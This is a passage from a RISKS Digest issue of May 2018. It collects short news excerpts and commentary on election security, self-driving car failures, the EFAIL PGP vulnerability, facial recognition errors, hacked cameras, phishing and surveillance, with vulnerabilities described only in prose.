    Staff (EFF)
    Email Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    Once Again, Activists Must Beg the Government to Preserve the
    Right to Repair (Motherboard)
    Widespread Misunderstanding of x86-64 Privileged Instruction
    Leads to Widespread Escalation Hazard (MITRE CVE 2018-8897)
    Alexa and Siri Can Hear This Hidden Command Audio Attacks (NYTimes)
    Buckle Up, Prime Members: Amazon Launches In-Car Delivery (Business Wire)
    Meant to Monitor Inmates' Calls Could Track You Too (NYTimes)
    Cell Phone Location data reportedly available to law enforcement
    without verification/process (Ars Technica)
    During disasters, active Twitter users likely to spread falsehoods:
    Study examines Boston Marathon bombing, Hurricane Sandy; also
    finds most users fail to correct misinformation (Science Daily)
    Face recognition police tools 'staggeringly inaccurate' (BBC.com)
    Intel Documentation Blamed for Multiple Operating System Security Flaws
    (IT Pro)
    The Problem with Chinese GPS (Now I Know)
    U.S. identifies suspect in major leak of CIA hacking tools (WashPo)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 7 May 2018 22:11:57 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: America continues to ignore the risks of election hacking
    (The New Yorker)

    America Continues to Ignore the Risks of Election Hacking | The New Yorker

    "America's voting systems are hackable in all kinds of ways. As a case
    in point, in 2016, the Election Assistance Commission, the bipartisan
    federal agency that certifies the integrity of voting machines, and
    that will now be tasked with administering Congress's three hundred
    and eighty million dollars, was itself hacked. The stolen data --
    log-in credentials of EAC staff members -- were discovered, by chance,
    by employees of the cybersecurity firm Recorded Future, whose
    computers one night happened upon an informal auction of the stolen
    passwords. ``This guy -- we randomly called him Rasputin -- was in a
    high-profile forum in the darkest of the darkest of the darkest corner
    of the dark Web, where hackers and reverse engineers, ninety-nine per
    cent of them Russian, hang out,'' Christopher Ahlberg, the CEO of
    Recorded Future, told me. ``There was someone from another country in
    the forum who implied he had a government background, and he wanted to
    get his hands on this stuff. That's when we decided we would just buy
    it. So we did, and took it to the government'' -- the U.S. government
    -- ``and the sale ended up being thwarted.'' (Ahlberg wouldn't
    identify which government agency his company had turned the data over
    to. The EAC, in a statement, referred questions about ``the
    investigation or information shared with the government by Recorded
    Future'' to the FBI The FBI, through a Justice Department
    spokesperson, declined to comment.)"

    ------------------------------

    Date: Tue, 8 May 2018 22:00:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Russia Tried to Undermine Confidence in Voting Systems, Senators Say
    (NYTimes)

    Russia Tried to Undermine Confidence in Voting Systems, Senators Say

    ------------------------------

    Date: Mon, 14 May 2018 00:55:08 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Virginia election officials assigned 26 voters to the wrong district
    (WashPo)

    More than two dozen voters cast ballots in the wrong race. They were among
    6,000 misassigned voters across the state. It might've cost Democrats a
    pivotal race.

    Va. election officials assigned 26 voters to the wrong district. It might’ve cost Democrats a pivotal race.

    ------------------------------

    Date: Tue, 15 May 2018 00:07:08 -0500
    From: Bruce Schneier <schn...@schneier.com>
    Subject: Securing Elections

    (PGN-excerpted from Bruce's CRYPTO-GRAM, 15 May 2018)

    Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them.

    [This is a long item, perhaps intended for non-RISKS readers.
    Nevertheless, it is highly relevant and timely. The full article is at
    Schneier on Security: Crypto-Gram
    PGN]

    ------------------------------

    Date: Sun, 6 May 2018 01:54:31 +0000
    From: John Colville <John.C...@uts.edu.au>
    Subject: Australian Emergency Calls Fail due to lightning strike (ABC AU)

    Calls to 000 (the Australian emergency phone number) failed to large areas of Australia on May 04 2018.

    Government to investigate Telstra triple-0 outage after emergency calls go unanswered

    Government to conduct investigation into Telstra triple-0 outage

    ------------------------------

    Date: Thu, 3 May 2018 15:51:21 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Self-driving cars' shortcomings revealed in DMV reports (Merc)

    NNSquad
    http://www.mercurynews.com/2018/05/01/self-driving-cars-shortcomings-revealed-in-dmv-reports/

    The disengagement reports themselves identify other problems some
    self-driving vehicles struggle with, for example heavy pedestrian traffic
    or poorly marked lanes. In describing the events that caused their backup
    drivers to take the controls, the companies have provided a new window
    into the road-worthiness -- or not -- of their cars and systems. Baidu, a
    Chinese Internet-search giant, reported a case in which driver had to take
    over because of a faulty steering maneuver by the robot car; several cases
    of "misclassified" traffic lights; a failure to yield for cross traffic;
    delayed braking behind a car that cut quickly in front; drifting out of a
    lane; and delayed perception of a pedestrian walking into the street.

    ------------------------------

    Date: Sat, 12 May 2018 02:29:16 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: VW bugs: "Unpatchable" remote code pwnage (TechBeacon)

    Two security researchers have excoriated Volkswagen Group for selling
    insecure cars. As in: hackable-over-the-Internet insecure.

    They broke into a recent-model VW and an Audi, via the cars' Internet
    connections, and were able to jump from system to system, running arbitrary
    code. Worryingly, they fully pwned the unauthenticated control bus connected
    to some safety-critical systems -- such as the cruise control.

    But VW has no way to push updates to its cars, and won't alert owners to
    visit a dealer for an update.

    http://techbeacon.com/vw-bugs-unpatchable-remote-code-pwnage

    ------------------------------

    Date: Mon, 7 May 2018 15:27:41 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Software bug led to death in Uber's self-driving crash (Ars Technica)

    NNSquad
    http://arstechnica.com/tech-policy/...bug-led-to-death-in-ubers-self-driving-crash/

    The fatal crash that killed pedestrian Elaine Herzberg in Tempe, Arizona,
    in March occurred because of a software bug in Uber's self-driving car
    technology, The Information's Amir Efrati reported on Monday. According to
    two anonymous sources who talked to Efrati, Uber's sensors did, in fact,
    detect Herzberg as she crossed the street with her bicycle.
    Unfortunately, the software classified her as a "false positive" and
    decided it didn't need to stop for her. Distinguishing between real
    objects and illusory ones is one of the most basic challenges of
    developing self-driving car software. Software needs to detect objects
    like cars, pedestrians, and large rocks in its path and stop or swerve to
    avoid them. However, there may be other objects -- like a plastic bag in
    the road or a trash can on the sidewalk -- that a car can safely ignore.
    Sensor anomalies may also cause software to detect apparent objects where
    no objects actually exist.

    [Also noted by Wendy Grossman: Classic case of where you set the
    positive/negative error rate tradeoffs in the classifier, but with the
    consequences amped up because it's a car on public roads, not a bit of
    software deciding between cats and giraffes: if you set the threshold
    too low the car stops (and jolts its passengers) for every plastic bag
    and shadow. If you set it too high...you get deaths. I wouldn't really
    call that a bug; I'd call it an experimental error. So besides the
    risks inherent in deciding where you set the threshold, there's the
    risk of allowing companies like Uber to run their experiments on public
    roads.]

    ------------------------------

    Date: Sun, 13 May 2018 13:35:53 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)

    The New York Times
    http://mobile.nytimes.com/2018/05/1...less-cars-and-their-carbon-monoxide-toll.html

    "It seems like a common convenience in a digital age: a car that can be
    powered on and off with the push of a button, rather than the mechanical
    turning of a key. But it is a convenience that can have a deadly effect.

    "On a summer morning last year, Fred Schaub drove his Toyota RAV4 into the
    garage attached to his Florida home and went into the house with the
    wireless key fob, evidently believing the car was shut off. Twenty-nine
    hours later, he was found dead, overcome with carbon monoxide that flooded
    his home while he slept. '``After 75 years of driving, my father thought
    that when he took the key with him when he left the car, the car would be
    off,'' said Mr. Schaub's son Doug.'

    Adoption of technological convenience carries transition risk. The article
    discusses a wrongful death lawsuit boosted by internal Toyota memos that
    discovered recommendations to integrate audible and visual warnings when
    the engine remains active with no key fob inside the vehicle. This
    recommendation was 86'd from implementation. Over 20 people have perished
    from vehicle-generated CO poisoning since 2006.

    ------------------------------

    Date: Sun, 13 May 2018 16:34:51 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: The risk from robot weapons (via The Statesman/Asia News Network,
    published in The Straits Times)

    http://www.straitstimes.com/asia/south-asia/the-risk-from-robot-weapons-the-statesman-contributor

    'A letter warning against the coming race of these weapons was signed in
    2015 by over 1,000 AI experts.'

    'Peter Singer, an expert on future warfare at 'New America", a think tank,
    has said that very powerful forces propel the AI arms race - geopolitical
    compulsions, scientific advances and profit-seeking high technology
    companies.

    'Scharre has also raised the possibility that perhaps because of badly
    written codes or perhaps because of cyber attack by an adversary, military
    use autonomous systems can malfunction, raising possibilities of attack on
    people or soldiers on the same side, or escalating conflicts or killing to
    unintended, highly exaggerated levels.'

    Numerous public proclamations admonishing on AV weapon risks are
    insufficient to deter investment and capability pursuit. There's apparently
    too much momentum among businesses and governments to deflect this
    juggernaut.

    With the Manhattan Project, scientific leadership recognized the risks
    nuclear weapons raised. Some scientists argued for a demonstration, rather
    than deployment, to compel quick Japanese surrender. Nagasaki and Hiroshima
    were destroyed to temporarily establish and project US nuclear hegemony as a
    deterrent.

    Aggressive international diplomacy among progressive governments might
    negotiate an non-proliferation of autonomous weaponry treaty (NPAWT), like
    the Treaty on the Non-Proliferation of Nuclear Weapons (NPT). However,
    an enforceable and verifiable treaty is unlikely to timely emerge given
    historical human proclivity and myopia, despite empirical evidence that
    argues for deliberate restraint and negotiation.

    [A timely reminder on the importance of negotiation to cut the risk of
    war can be found here
    (http://www.nytimes.com/2018/05/11/opinion/nuclear-doomsday-denial.html).]

    ------------------------------

    Date: Sun, 13 May 2018 17:22:56 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    *The Washington Post*

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    "Whatever its shortcomings, the Kennedy speech is just the latest way that
    history is being digitally re-created, updated and manipulated as never
    before. From meticulously colorized photographs to immersive
    virtual-reality battlefields, scholars, artists and entrepreneurs are
    dragging the old days into the computer age. And scholastic standards are
    straining to keep up.

    "The U.S. Military Academy is working on a phone-based app along the lines
    of Pokemon Go that will let visitors see how George Washington's troops
    strung a massive iron chain across the Hudson River. A team in North
    Carolina has synthesized an important but unrecorded 1960 speech by Martin
    Luther King Jr., acoustically accurate down to the echoes in the Durham
    church."

    Simulation capability has improve to the point where a political leader can
    be used to construct a fictitious speech which appears authentic, with the
    power to convince an enraptured audience. This capability, if exploited by
    mendacious political entities, can accelerate democracy's decline.

    Publication of false and misleading political speech, especially by elected
    authorities, empowers authoritarianism. Current political discourse in the
    US is heavy with misleading facts and falsehoods that confuse public
    sentiment. This manipulation distracts attention from government's intent to
    apparently conceal a hidden political agenda. Exactly what the agenda is,
    beyond "pay for play," is difficult to divine.

    The introduction of bots applied for this purpose introduces an asymmetric
    multiplier for dissembled political discourse. By the time a policy becomes
    apparent through executive enforcement, the bots will have buried the policy
    agenda into a messaging morass that will potentially overwhelm any
    independent observer's (the free press) ability to analyze. The result is
    likely to suppress litigation that thwarts ill-conceived public policy that
    exclusively benefits "payers."

    ------------------------------

    Date: Sat, 5 May 2018 11:51:07 +0200
    From: Alberto Cammozzo <ac+...@zeromx.net>
    Subject: 2,000 wrongly matched with possible criminals at Champions League
    (BBC AU)

    (via Diego Latella)


    More than 2,000 people were wrongly identified as possible criminals by
    facial scanning technology at the 2017 Champions League final in Cardiff.
    South Wales Police used the technology as about 170,000 people were in
    Cardiff for the Real Madrid v Juventus game. But out of the 2,470 potential
    matches with custody pictures - 92% - or 2,297 were wrong.

    Chief Constable Matt Jukes said officers "did not take action" and no one
    was wrongly arrested.

    South Wales Police have made 450 arrests in the last nine months using the
    automatic facial recognition (AFR) software, which scans faces comparing
    them to about 500,000 custody images

    http://www.bbc.co.uk/news/technolog...d5b45569c1|40779d3379c44626b8bf140c4d5e9075|1

    ------------------------------

    Date: Sun, 6 May 2018 15:15:31 +0100
    From: Wols Lists <antl...@youngman.org.uk>
    Subject: KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Osborne, R 30 68)

    Actually, I believe it exploits a flaw in the most common IMPLEMENTATION
    of the protocol.

    For security reasons, once the key has been checked the first time, the
    recipient forgets it (over-writes it with 0s), so if the attacker can
    interrupt the handshake at that point, they can resend a key of all zeros
    and authenticate.

    The receiver should either abort the handshake completely, or not
    forget the key until the handshake is complete.

    ------------------------------

    Date: Sun, 6 May 2018 22:54:59 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Nigerian Email Scammers Are More Effective Than Ever (WiReD)

    You would think that after decades of analyzing and fighting email spam,
    there'd be a fix by now for the Internet's oldest hustle -- the Nigerian
    Prince scam. There's generally more awareness that a West African noble
    demanding $1,000 in order to send you millions is a scam, but the underlying
    logic of these 00 pay a little, get a lot-- schemes, also known as 419
    fraud, still ensnares a ton of people. In fact, groups of fraudsters in
    Nigeria continue to make millions off of these classic cons. And they
    haven't just refined the techniques and expanded their targets -- they've
    gained minor celebrity status for doing it.

    http://www.wired.com/story/nigerian-email-scammers-more-effective-than-ever

    ------------------------------

    Date: Sun 6 May 2018 11:12:58 -0000
    From: "Wendy M. Grossman" <wen...@pelicancrossing.net>
    Subject: Dark code (DW)

    In the way of the TSB computing disaster (which DW has a long piece on the
    legacy code that runs banking systems, so old that no one understands it any
    more. The problem: you can't stay in business without updating, and updating
    it breaks things.

    Ellen Ullman has often written about this -- see for example 1997's Close to
    the Machine and her more recent sort-of-sequel.

    http://m.dw.com/en/fail-by-design-bankings-legacy-of-dark-code/a-43645522

    ------------------------------

    Date: Sun, 6 May 2018 13:36:41 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Postmortem of Fortnite Service Outage (Epic Games)

    On 11 Apr 2018, we experienced an extended outage coinciding with the
    release of Fortnite 3.5. The outage blocked all logins for all players to
    our platform. We know many millions of you were excited about dropping from
    the Battle Bus with your friends, and it was a long time to wait to check
    out our 3.5 release. We sincerely apologize for the downtime.

    We're sharing more technical details in this post to give you a better
    understanding about what went wrong, what we did to fix it, and how we can
    prevent future issues like this from happening again.

    http://www.epicgames.com/fortnite/en-US/news/postmortem-of-service-outage-4-12

    ------------------------------

    Date: Sun, 6 May 2018 16:31:20 -0700
    From: Mark Thorson <e...@dialup4less.com>
    Subject: Collateral damage (538)

    You can't opt out from other people sharing data about you, such as the
    relative of the Golden State Killer who put DNA data on a website.

    http://fivethirtyeight.com/features/you-cant-opt-out-of-sharing-your-data-even-if-you-didnt-opt-in/

    ------------------------------

    Date: Mon, 7 May 2018 16:16:28 -0400
    From: George Mannes <gma...@gmail.com>
    Subject: Dozens of security cameras hacked in Japan (Mainichi)

    from Mainichi.jp English-language site:
    http://mainichi.jp/english/articles/20180507/p2g/00m/0dm/063000c#cxrecs_s

    TOKYO (Kyodo) -- Dozens of Canon Inc.'s security cameras connected to the
    Internet have been hacked across Japan, making them uncontrollable at
    waterways, a fish market, and a care facility among other places, users said
    Monday. Over 60 cameras nationwide are believed to have been illegally
    accessed so far. ...

    While it remains unclear why Canon cameras have been targeted, the city of
    Yachiyo in Chiba Prefecture and the city of Ageo in Saitama Prefecture,
    which lost control of the cameras for monitoring the levels of their
    waterways, said they had failed to reset the cameras' default passwords.....

    Hackings were also reported at other locations including a fish market in
    Hiroshima, a care facility for the disabled in Kobe, and a Naha branch of a
    company based in Saitama Prefecture....

    [This news item seems custom-designed for a classic-style PGN joke linking
    fishy business at the market, constant comp.risks complaints about poor
    password management, and Hiroshima's hometown baseball team, the Carp. Have
    at it.]

    [OK. Carpe Diem? I had dinner in Kobe's in Lahaina (Maui) last night. I
    have no beef with this item, even if it might smell fishy. ``If you knew
    Sushi like I knew Sushi,'' oh, whatta place... ``She shells seashells by
    the seashore.'' PGN]

    ------------------------------

    Date: Wed, 9 May 2018 23:53:49 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Technology turns our cities into spies for ICE, whether we like
    it or not (LATimes)

    There are more than 30 Oakland Police Department patrol cars roaming the
    city with license plate readers, specialized cameras that can scan and
    record up to 60 license plates per second. Meanwhile, the Alameda County
    Sheriff's Office maintains a fleet of six drones to monitor crime scenes
    when it sees fit. The Alameda County district attorney's office owns a
    StingRay, a device that acts as a fake cell tower and forces phones to give
    up their location. And that's just in one little corner of California.

    Just as consumer electronics continually get faster, cheaper, smaller, and
    more sophisticated, so too do the tools law enforcement uses to spy on
    us. What once demanded significant money and manpower can be accomplished
    easily by machine. This advanced technology is hurtling toward us so fast
    that privacy laws can't keep up.

    http://www.latimes.com/opinion/op-ed/la-oe-farivar-surveillance-tech-20180502-story.html

    ------------------------------

    Date: Sun, 6 May 2018 22:22:09 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Digital Vigilantes Who Hack Back (The New Yorker)

    American companies that fall victim to data breaches want to retaliate
    against the culprits. But can they do so without breaking the law?

    http://www.newyorker.com/magazine/2018/05/07/the-digital-vigilantes-who-hack-back

    ------------------------------

    Date: Wed, 9 May 2018 23:57:31 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Bring in the Nerds: EFF Introduces Actual Encryption Experts to
    U.S. Senate Staff (EFF)

    Electronic Frontier Foundation

    Earlier today in the U.S. Capitol Visitor Center, EFF convened a closed-door
    briefing for Senate staff about the realities of device encryption. While
    policymakers hear frequently from the FBI and the Department of Justice
    about the dangers of encryption and the so-called Going Dark problem, they
    very rarely hear from actual engineers, cryptographers, and computer
    scientists. Indeed, the usual suspects testifying before Congress on
    encryption are nearly the antithesis of technical experts.

    The all-star lineup of panelists included Dr. Matt Blaze, professor of
    computer science at the University of Pennsylvania, Dr. Susan Landau,
    professor of cybersecurity and policy at Tufts University; Erik
    Neuenschwander, Apple's manager of user privacy; and EFF's tech policy
    director Dr. Jeremy Gillula.

    http://www.eff.org/deeplinks/2018/0...ces-actual-encryption-experts-us-senate-staff

    [Incidentally, this is the 20th anniversary of the famous L0pht testimony
    from Mudge's team, which immediately followed my testimony for the
    U.S. Permanent Subcommittee on Investigations of the Senate Committee on
    Governmental Affairs included in Weak Computer Security in Government: Is
    the Public at Risk? <http://www.csl.sri.com/neumann/senate98.html> PGN]

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Email Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    http://fortune.com/2018/05/14/email-encryption-tool-vulnerability-cybersecurity-warning/

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    http://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/

    ------------------------------

    Date: Wed, 9 May 2018 23:50:09 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Once Again, Activists Must Beg the Government to Preserve the
    Right to Repair (Motherboard)

    The excruciating DMCA section 1201 exemption process is upon us again,
    and the right to repair tractors, cars, and electronics is at stake.

    http://motherboard.vice.com/en_us/article/mbxzyv/dmca-1201-exemptions

    ------------------------------

    Date: Thu, 10 May 2018 04:34:02 -0700
    From: Bob Gezelter <geze...@rlgsc.com>
    Subject: Widespread Misunderstanding of x86-64 Privileged Instruction
    Leads to Widespread Escalation Hazard (MITRE CVE 2018-8897)

    Apparently, a large number kernel-level developers have misunderstood the
    documentation concerning the interruptability of an x86-64 instruction. This
    misunderstanding has made many major operating systems on the x86-64
    platform vulnerable to a privilege escalation hazard.

    Patches have reportedly been issued. Intel has also re-issued its x86-64
    Software Development Manuals.

    A description of the vulnerability can be found at:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897

    [For those of you following the CVE list, it has just exceeded 100,000 CVE
    entries. This should be a warning for anyone reading RISKS who believes
    our computer systems are secure. PGN]

    ------------------------------

    Date: Thu, 10 May 2018 18:01:36 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Alexa and Siri Can Hear This Hidden Command Audio Attacks (NYTimes)

    http://www.nytimes.com/2018/05/10/technology/alexa-siri-hidden-command-audio-attacks.html

    Researchers can now send secret audio instructions undetectable to the human
    ear to Apple's Siri, Amazon's Alexa and Google's Assistant.

    ------------------------------

    Date: Fri, 11 May 2018 11:15:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Buckle Up, Prime Members: Amazon Launches In-Car Delivery
    (Business Wire)

    Millions of Prime members with Chevrolet, Buick, GMC, Cadillac and Volvo
    cars can now use Amazon Key to have their Amazon packages delivered inside
    their vehicle parked at home, work or near other locations in their address
    book

    In-car delivery is available at no extra cost for Prime members -- customers
    simply download the Amazon Key App, link to their connected car and start
    ordering on Amazon.com; no additional hardware or devices required

    To get started, customers download the Amazon Key App and then link their
    Amazon account with their connected car service account. Once setup is
    complete and the delivery location has been registered, customers can shop
    on Amazon.com and select the In-Car delivery option at checkout.

    On delivery day, the Amazon Key App lets customers check if they've parked
    within range of the delivery location, and provides notifications with the
    expected 4-hour delivery time window. The App also notifies customers when
    the delivery is on its way, and the package has been delivered. Customers
    can track when their car was unlocked and relocked in the App's activity
    feed, and rate their in-car delivery.

    http://www.businesswire.com/news/ho...Prime-Members-Amazon-Launches-In-Car-Delivery

    ------------------------------

    Date: Sat, 12 May 2018 02:30:18 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Meant to Monitor Inmates' Calls Could Track You Too (NYTimes)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Sat, 12 May 2018 06:38:12 -0700
    From: Bob Gezelter <geze...@rlgsc.com>
    Subject: Cell Phone Location data reportedly available to law enforcement
    without verification/process (Ars Technica)

    Ars Technica is reporting that a service meant for use with prison phone
    systems lacks authentication and safeguards. It has reportedly already been
    used to track people without legal jurisdiction.

    Access to non-anonymized geolocation data for mobile devices by third
    parties is a serious privacy hazard. The article does not indicate the
    degree of reporting or other measures undertaken to ensure accountability.
    In this context, even advertising delivered to a identifiable device is a
    hazard.

    http://arstechnica.com/tech-policy/...bility-to-get-real-time-mobile-location-data/

    ------------------------------

    Date: Sun, 13 May 2018 11:08:59 -0400S
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: During disasters, active Twitter users likely to spread
    falsehoods: Study examines Boston Marathon bombing, Hurricane Sandy; also
    finds most users fail to correct misinformation (Science Daily)

    http://www.sciencedaily.com/releases/2018/05/180512190537.htm

    ------------------------------

    Date: Sun, 13 May 2018 10:01:11 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: "Warning: Dangerous Fake Emails About Google Privacy Changes"

    (Lauren's Blog)
    http://lauren.vortex.com/2018/05/13/warning-dangerous-fake-emails-about-google-privacy-changes

    If you use much of anything Google, by now you've likely gotten at least one
    email from Google noting various privacy-related changes. They typically
    have the Subject:

    Improvements to our Privacy Policy and Privacy Controls

    and tend to arrive not from the expected simple "google.com" domain but
    rather from unusual appearing Google subdomains, with addresses like:

    privacy...@www3.l.google.com

    The notice also includes a bunch of links to various relevant privacy pages
    and/or systems at Google.

    All of this is in advance of the effective date for the European Union's
    "GDPR" laws. If you're not familiar with the GDPR, it's basically the latest
    hypocritical move by the EU on their relentless march toward dictating the
    control of personal data globally and to further their demands to become a
    global censorship czar -- with the ability to demand the deletion of any
    search engine results around the world that they find inconvenient. Joseph
    Stalin would heartily approve.

    One can assume that Google's privacy team has been putting in yeoman's
    service to meet the EU's dictatorial demands, and it's logical that Google
    decided to make other changes in their privacy ecosystem at the same time,
    and now is informing users about those changes.

    Unfortunately, phishing crooks are apparently already taking advantage of
    this situation -- in particular several aspects of these Google notification
    emails.

    First, the legitimate Google privacy emails going out recently and
    currently are a veritable flood. It appears that Google is sending
    these out to virtually every email address ever associated with any
    Google account since perhaps the dawn of time. I've already received
    approximately 1.3E9 of them. OK, not really that many, but it FEELS
    like that many.

    Some of these are coming in to addresses that I don't even recognize.
    This morning one showed up to such a strange address that I had to go
    digging in my alias databases to figure out what it actually was. It
    turned out to be so ancient that cobwebs flew out of my screen at me
    when I accessed its database entry.

    Seriously, these are one hell of a lot of emails, and the fact that
    they come from somewhat unusual looking google subdomains and include
    links has made them fodder for the crooks.

    You can guess what's happening. Phishing and other criminal types are
    sending out fraudulent emails that superficially appear to be the same
    as these legit Google privacy policy notification emails. Of course,
    some or all of the links in the phishing emails lead not to Google but
    to various evil traps and personal data stealing tricks.

    So please, be extraordinarily careful when you receive what appear to be
    these privacy notices from Google. With so many real ones going out -- with
    multiples often ending up at the same individual via various redirects and
    forwarding addresses -- it's easy for fake versions to slip in among the
    real ones, and clicking on the links in the crooked ones or opening
    attachments that they include can seriously ruin your day, to say the very
    least.

    Take care, all.

    ------------------------------

    Date: Mon, 14 May 2018 18:12:34 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Face recognition police tools 'staggeringly inaccurate' (BBC.com)



    'The Metropolitan Police used facial recognition at London's Notting Hill
    carnival in 2016 and 2017 and at a Remembrance Sunday event. 'Its system
    incorrectly flagged 102 people as potential suspects and led to no
    arrests. 'In figures given to Big Brother Watch, South Wales Police said
    its technology had made 2,685 "matches" between May 2017 and March 2018 -
    but 2,451 were false alarms. 'Big Brother Watch also raised concerns that
    photos of any "false alarms" were sometimes kept by police for weeks.'

    Perhaps the UK should import and deploy PRC cameras per RISKS-30.65.

    ------------------------------

    Date: Tue, 15 May 2018 13:25:53 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Intel Documentation Blamed for Multiple Operating System Security
    Flaws (IT Pro)

    Anybody who's been involved with tech for a while has most likely come
